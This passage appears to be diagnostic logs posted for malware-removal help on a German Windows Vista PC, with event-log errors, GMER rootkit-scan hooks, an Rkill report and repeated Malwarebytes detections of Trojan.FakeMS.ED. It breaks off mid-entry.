Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (12/05/2014 08:55:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung tdsskiller.exe, Version 3.0.0.41, Zeitstempel 0x544faf36, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x00000000,
Prozess-ID 0xe9c, Anwendungsstartzeit tdsskiller.exe0.
Error: (12/05/2014 08:54:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung cdsupdclient.exe, Version 2.0.3.60, Zeitstempel 0x533946fa, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xf88, Anwendungsstartzeit cdsupdclient.exe0.
System errors:
=============
Error: (12/06/2014 08:40:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: utilitylocalspl_861
Error: (12/06/2014 08:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: scrollingwin32Prot1
Error: (12/06/2014 08:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: guicca321
Error: (12/06/2014 08:40:34 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: DesktopMBRText1
Error: (12/06/2014 08:40:29 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: gnuutilityUI.exe1
Error: (12/05/2014 09:43:23 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: gnuutilityUI.exe
Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: FrozenSambaWindows.exe%%3
Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: FrozenGNUThumbnail.exe%%3
Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: evrtspkgBckp.exe%%3
Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: compilerehtraceProt.exe%%3
Microsoft Office Sessions:
=========================
CodeIntegrity Errors:
===================================
Date: 2014-12-06 09:22:12.373
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:22:11.583
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:22:10.543
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:22:09.333
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:19:33.862
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:19:32.609
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:19:31.658
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:19:30.466
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:00:38.972
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 09:00:37.989
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 56%
Total physical RAM: 3001.08 MB
Available physical RAM: 1320.47 MB
Total Pagefile: 6232.43 MB
Available Pagefile: 4528.82 MB
Total Virtual: 2047.88 MB
Available Virtual: 1869.68 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:238.11 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive j: () (Removable) (Total:1.86 GB) (Free:1.82 GB) FAT
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (Size: 1.9 GB) (Disk ID: 00000000)
Partition: GPT Partition Type.
==================== End Of Log ============================
Code:
ATTFilter GMER 2.1.19357 - hxxp://www.gmer.net
Rootkit scan 2014-12-06 10:24:00
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 Hitachi_HTS543232L9A300 rev.FB4OC40C 298,09GB
Running: v5shw8ku.exe; Driver: C:\Users\finja\AppData\Local\Temp\ugloypow.sys
---- User code sections - GMER 2.1 ----
.text C:\Windows\system32\taskeng.exe[396] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0302BAB6
.text C:\Windows\system32\taskeng.exe[396] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0302BB79
.text C:\Windows\system32\taskeng.exe[396] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0302BCFE
.text C:\Windows\system32\taskeng.exe[396] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0302BC38
.text C:\Windows\system32\taskeng.exe[396] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 0302A55A
.text C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0406B285
.text C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0406B32B
.text C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0406B476
.text C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0406B3CD
.text C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 04069D69
.text C:\Windows\system32\wbem\unsecapp.exe[1856] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 01B6B285
.text C:\Windows\system32\wbem\unsecapp.exe[1856] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 01B6B32B
.text C:\Windows\system32\wbem\unsecapp.exe[1856] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 01B6B476
.text C:\Windows\system32\wbem\unsecapp.exe[1856] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 01B6B3CD
.text C:\Windows\system32\wbem\unsecapp.exe[1856] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 01B69D69
.text C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0079B285
.text C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0079B32B
.text C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0079B476
.text C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0079B3CD
.text C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 00799D69
.text C:\Windows\system32\igfxsrvc.exe[3036] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 01D0BAB6
.text C:\Windows\system32\igfxsrvc.exe[3036] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 01D0BB79
.text C:\Windows\system32\igfxsrvc.exe[3036] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 01D0BCFE
.text C:\Windows\system32\igfxsrvc.exe[3036] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 01D0BC38
.text C:\Windows\system32\igfxsrvc.exe[3036] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 01D0A55A
.text C:\Windows\System32\mobsync.exe[3072] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0226BAB6
.text C:\Windows\System32\mobsync.exe[3072] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0226BB79
.text C:\Windows\System32\mobsync.exe[3072] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0226BCFE
.text C:\Windows\System32\mobsync.exe[3072] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0226BC38
.text C:\Windows\System32\mobsync.exe[3072] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 0226A55A
.text C:\Program Files\Apoint2K\Apntex.exe[3140] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0199B285
.text C:\Program Files\Apoint2K\Apntex.exe[3140] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0199B32B
.text C:\Program Files\Apoint2K\Apntex.exe[3140] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0199B476
.text C:\Program Files\Apoint2K\Apntex.exe[3140] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0199B3CD
.text C:\Program Files\Apoint2K\Apntex.exe[3140] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 01999D69
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] kernel32.dll!CreateThread 7790CBEE 5 Bytes JMP 6DFB74FB C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!EnableWindow 7633CD8B 5 Bytes JMP 6DFFA25C C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DefWindowProcA 7633DB88 7 Bytes JMP 6DFB9729 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!CreateWindowExA 7633DC2A 5 Bytes JMP 6DFC353B C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!CreateWindowExW 76341305 5 Bytes JMP 6E01FFDF C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DefWindowProcW 763503B4 7 Bytes JMP 6E017C92 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxParamW 763610B0 5 Bytes JMP 6DF518E3 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxIndirectParamW 76362EF5 5 Bytes JMP 6E14DBA6 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxParamA 76378152 5 Bytes JMP 6E14DB41 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxIndirectParamA 7637847D 5 Bytes JMP 6E14DC0B C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxIndirectA 7638D4D9 5 Bytes JMP 6E14DAC8 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxIndirectW 7638D5D3 5 Bytes JMP 6E14DA4F C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxExA 7638D639 5 Bytes JMP 6E14D9EB C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxExW 7638D65D 5 Bytes JMP 6E14D987 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3276] ole32.dll!OleLoadFromStream 776F1E80 5 Bytes JMP 6E14E374 C:\Windows\system32\IEFRAME.dll
.text C:\Program Files\Launch Manager\LManager.exe[3508] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0084BAB6
.text C:\Program Files\Launch Manager\LManager.exe[3508] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0084BB79
.text C:\Program Files\Launch Manager\LManager.exe[3508] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0084BCFE
.text C:\Program Files\Launch Manager\LManager.exe[3508] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0084BC38
.text C:\Program Files\Launch Manager\LManager.exe[3508] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 0084A55A
.text C:\Program Files\Apoint2K\Apoint.exe[3564] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0273BAB6
.text C:\Program Files\Apoint2K\Apoint.exe[3564] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0273BB79
.text C:\Program Files\Apoint2K\Apoint.exe[3564] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0273BCFE
.text C:\Program Files\Apoint2K\Apoint.exe[3564] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0273BC38
.text C:\Program Files\Apoint2K\Apoint.exe[3564] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 0273A55A
.text C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 02A0BAB6
.text C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 02A0BB79
.text C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 02A0BCFE
.text C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 02A0BC38
.text C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 02A0A55A
.text C:\Windows\System32\igfxtray.exe[3700] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0274BAB6
.text C:\Windows\System32\igfxtray.exe[3700] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0274BB79
.text C:\Windows\System32\igfxtray.exe[3700] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0274BCFE
.text C:\Windows\System32\igfxtray.exe[3700] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0274BC38
.text C:\Windows\System32\igfxtray.exe[3700] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 0274A55A
.text C:\Windows\System32\hkcmd.exe[3708] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 02BABAB6
.text C:\Windows\System32\hkcmd.exe[3708] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 02BABB79
.text C:\Windows\System32\hkcmd.exe[3708] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 02BABCFE
.text C:\Windows\System32\hkcmd.exe[3708] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 02BABC38
.text C:\Windows\System32\hkcmd.exe[3708] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 02BAA55A
.text C:\Windows\System32\igfxpers.exe[3716] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 02C9BAB6
.text C:\Windows\System32\igfxpers.exe[3716] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 02C9BB79
.text C:\Windows\System32\igfxpers.exe[3716] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 02C9BCFE
.text C:\Windows\System32\igfxpers.exe[3716] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 02C9BC38
.text C:\Windows\System32\igfxpers.exe[3716] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 02C9A55A
.text C:\Program Files\Microsoft Security Client\msseces.exe[3756] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 0268BAB6
.text C:\Program Files\Microsoft Security Client\msseces.exe[3756] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 0268BB79
.text C:\Program Files\Microsoft Security Client\msseces.exe[3756] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 0268BCFE
.text C:\Program Files\Microsoft Security Client\msseces.exe[3756] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 0268BC38
.text C:\Program Files\Microsoft Security Client\msseces.exe[3756] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 0268A55A
.text C:\Windows\ehome\ehtray.exe[3860] kernel32.dll!CreateProcessW 778C1BF3 5 Bytes JMP 02D9BAB6
.text C:\Windows\ehome\ehtray.exe[3860] kernel32.dll!CreateProcessA 778C1C28 5 Bytes JMP 02D9BB79
.text C:\Windows\ehome\ehtray.exe[3860] ADVAPI32.dll!CreateProcessAsUserA 7672CEB9 5 Bytes JMP 02D9BCFE
.text C:\Windows\ehome\ehtray.exe[3860] ADVAPI32.dll!CreateProcessAsUserW 76741EE9 5 Bytes JMP 02D9BC38
.text C:\Windows\ehome\ehtray.exe[3860] CRYPT32.dll!PFXImportCertStore 75CEA13D 5 Bytes JMP 02D9A55A
---- Devices - GMER 2.1 ----
AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys
---- Threads - GMER 2.1 ----
Thread explorer.exe [2620:2600] 02286884
Thread explorer.exe [2620:2388] 02286886
Thread explorer.exe [2620:1964] 02286886
Thread explorer.exe [4148:5312] 00449244
Thread explorer.exe [4148:5044] 00449246
---- Registry - GMER 2.1 ----
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\933448FAA8F23954183BF9C44530C8E4\Usage@WinMailFeat 1166409757
---- EOF - GMER 2.1 ----
Code:
ATTFilter Rkill 2.6.8 by Lawrence Abrams (Grinler)
hxxp://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
hxxp://www.bleepingcomputer.com/forums/topic308364.html
Program started at: 12/06/2014 08:40:21 AM in x86 mode.
Windows Version: Windows Vista (TM) Home Premium Service Pack 2
Checking for Windows services to stop:
* No malware services found to stop.
Checking for processes to terminate:
* C:\Users\finja\AppData\Local\gnuutilityUI\gnuutilityUI.exe (PID: 2112) [UP-HEUR]
* C:\Windows\system32\DesktopMBRText\DesktopMBRText.exe (PID: 2004) [WD-HEUR]
* C:\Windows\system32\guicca32\guicca32.exe (PID: 3516) [WD-HEUR]
* C:\Windows\system32\scrollingwin32Prot\scrollingwin32Prot.exe (PID: 3968) [WD-HEUR]
* C:\Windows\system32\utilitylocalspl_86\utilitylocalspl_86.exe (PID: 3152) [WD-HEUR]
5 proccesses terminated!
Checking Registry for malware related settings:
* No issues found in the Registry.
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
Performing miscellaneous checks:
* No issues found.
Checking Windows Service Integrity:
* Windows-Firewall (MpsSvc) is not Running.
Startup Type set to: Disabled
* Sicherheitscenter (wscsvc) is not Running.
Startup Type set to: Disabled
* Windows-Firewallautorisierungstreiber (mpsdrv) is not Running.
Startup Type set to: Manual
Searching for Missing Digital Signatures:
* No issues found.
Checking HOSTS File:
* HOSTS file entries found:
127.0.0.1 localhost
::1 localhost
127.0.0.1 d3oxij66pru1i3.cloudfront.net
Program finished at: 12/06/2014 08:50:20 AM
Execution time: 0 hours(s), 10 minute(s), and 26 seconds(s)
Code:
ATTFilter Malwarebytes Anti-Malware www.malwarebytes.org Detection, 06.12.2014 08:27:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:36, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:36, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Detection, 06.12.2014 08:27:43, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Update, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Scheduler, Malware Database, 2014.12.5.11, 2014.12.6.4, Protection, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Protection, Refresh, Starting, Protection, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopping, Protection, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopped, Detection, 06.12.2014 08:28:13, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31] Protection, 06.12.2014 08:29:17, SYSTEM, FINJA-PC, Protection, Refresh, Success, Protection, 06.12.2014 08:29:17, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Starting, Protection, 06.12.2014 08:29:22, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Started, Detection, 06.12.2014 08:29:23, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:29:27, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:29:39, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:29:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:30:01, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:30:29, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:30:41, finja, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:30:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:30:56, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:31:00, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:31:15, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:31:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:32:45, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:33:28, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:33:31, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:33:41, SYSTEM, 